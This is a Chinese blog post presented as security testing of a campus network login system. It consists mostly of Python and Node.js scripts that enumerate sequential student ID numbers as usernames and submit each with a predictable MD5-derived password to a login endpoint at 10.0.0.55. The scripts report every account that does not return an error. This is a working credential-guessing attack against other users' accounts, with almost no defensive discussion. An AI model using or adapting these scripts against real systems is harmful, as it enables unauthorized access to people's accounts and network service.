【安全】测试校园网认证系统帐号密码

Python版本

Python版本为3.3.2，好像现在还是2.*的天下，但貌似3.*要显得高大上，库和函数好像也略屌略简单一些；

初学Python，这是真正意义上写的第一个程序，很多地方都不熟练，特别是Python3语法和类型转换这块调试了很久 o(︶︿︶)o

下面代码完美运行无压力(*^__^*) 但好像效率有点低 .. 跑的没有NODE.JS快；

 1 import urllib.parse,urllib.request,http.cookiejar
 2 from hashlib import md5
 3 
 4 def GetUrlRequest(usr):
 5     pw = usr
 6     m = md5()
 7     m.update(pw)
 8     form = {
 9         'username':usr,
10         'password':m.hexdigest()[8:24],
11         'drop':'0',
12         'type':'1',
13         'n':'100'
14         }
15     postdata = urllib.parse.urlencode(form).encode(encoding = 'UTF8')
16     hostpath = 'http://10.0.0.55/cgi-bin/do_login'
17     header = {
18         'Content-Type':'application/X-www-form-urlencoded'
19         }
20     req = urllib.request.Request(
21         url = hostpath,
22         data = postdata,
23         headers = header
24         )
25     return urllib.request.urlopen(req).read().decode("UTF8")
26 
27 name = b'1120130000'
28 for i in range(0,100):
29     if (GetUrlRequest(name) != 'username_error' and GetUrlRequest(name) != 'password_error'):
30         print('可用帐号')
31         print(name)
32     name_int = int(name)
33     name_int = name_int + 1
34     name_str = str(name_int)
35     name = name_str.encode()

NODE.JS版本

以下代码不能直接跑，缺少MD5加密算法实现，加上后就没问题了，由于MD5的javascript实现有点长，所以就不贴在这儿了；

 1 var first = 1120130000;
 2 var http = require('http');
 3 var querystring = require('querystring');
 4 var form = {
 5     username:'',
 6     password:'',
 7     drop:0,
 8     type:1,
 9     n:100,
10 }
11 var contents = querystring.stringify(form);
12 var options = {
13     host:'10.0.0.55',
14     path:'/cgi-bin/do_login',
15     method:'POST',
16     headers:{
17         'Content-Type':'application/x-www-form-urlencoded',
18         'Content-Length':contents.length
19     }
20 };
21 var count = 0;
22 function sendOp(){
23     var pass=hex_md5(first+'').substr(8,16);
24     form.username = first;
25     form.password = pass;
26     contents = querystring.stringify(form);
27     options.headers['Content-Length'] = contents.length;
28     var req = http.request(options,function(res){
29         res.setEncoding('utf8');
30         res.on('data',function(data){
31             if(data != 'username_error' && data != 'password_error'){
32                 console.log(first);
33                 console.log(pass);
34                 console.log(data);
35                 console.log('
');
36             } 
37             count++;
38             if(count<100){
39                 first++;
40                 sendOp();
41             }
42         });
43     });
44     req.write(contents);
45     req.end();
46 }
47 sendOp();